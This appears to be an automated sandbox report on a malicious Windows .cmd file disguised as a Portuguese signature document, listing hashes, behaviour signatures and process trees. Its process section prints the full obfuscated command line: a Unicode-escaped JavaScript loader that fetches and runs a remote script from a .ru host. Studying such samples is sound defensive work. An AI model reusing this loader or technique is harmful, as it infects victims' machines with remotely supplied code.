Overview

overview

8

Static

static

1

Assinatura...87.cmd

windows7-x64

8

Assinatura...87.cmd

windows10-2004-x64

8

Assinatura...87.lnk

windows7-x64

3

Assinatura...87.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    62s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/04/2023, 17:41

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    AssinaturaAutentique089.998686.95887.cmd

  • Size

    835B

  • MD5

    7e73323d8389accd3a107c75cc2ab959

  • SHA1

    9561365e1e2d7f6e3ecc838b3bacc2b5f1aa1da8

  • SHA256

    7af4b5096515aa03b9aed7972229f143b67c73f5654bdf82fdd91be90b638f6e

  • SHA512

    0750f973200c505706119234c676a96877c055cc3d90e432a56be6abc39dba10c36543a406cd9d364b3f3eebdba3395a312e9d1f80b538f581a1a6f9b7f9977c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AssinaturaAutentique089.998686.95887.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Windows\system32\cmd.exe
      cmd C:\Windows\system32\cmd.exe /V/D/c "md C:\GYy7OLJ\>nul 2>&1 &&s^eT RCWG=C:\GYy7OLJ\^GYy7OLJ.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0066\u0044\u0061\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0066\u0044\u0061\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0066\u0044\u0061\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0066\u0044\u0061\u002b\u0044\u0066\u0044\u0061\u002b\u0045\u0066\u0044\u0061\u002b\u0022\u002f\u002f\u0034\u0070\u0069\u0075\u0065\u0038\u002e\u0061\u0064\u006d\u0069\u006e\u0077\u0065\u0062\u0067\u0065\u0073\u0074\u0061\u006f\u002e\u0076\u006c\u0061\u0064\u0069\u006d\u0069\u0072\u002e\u0072\u0075\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!RCWG!&&ca^ll !RCWG!"
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4720
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\GYy7OLJ\GYy7OLJ.Js"
        3⤵
        • Blocklisted process makes network request
        PID:3108

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\GYy7OLJ\GYy7OLJ.Js
          Filesize

          714B

          MD5

          add3f002b4804beb5f6b0e0575158538

          SHA1

          ee4b3d15b685958ab96934d900c4c34ecee65697

          SHA256

          4838b1736d99985ac477bc06ed4339ffb8c1f1c57d585d2d7a74e7d6637efe4f

          SHA512

          7cd47449fc7346091ec3fe8fee8c3d79a5badc41bdfceae5cd92a48409bd2a70f013992f60ba33e79b364031e4c95ebd7fe8b85e464b6c5fef092f57c6082d8b

          Download Submit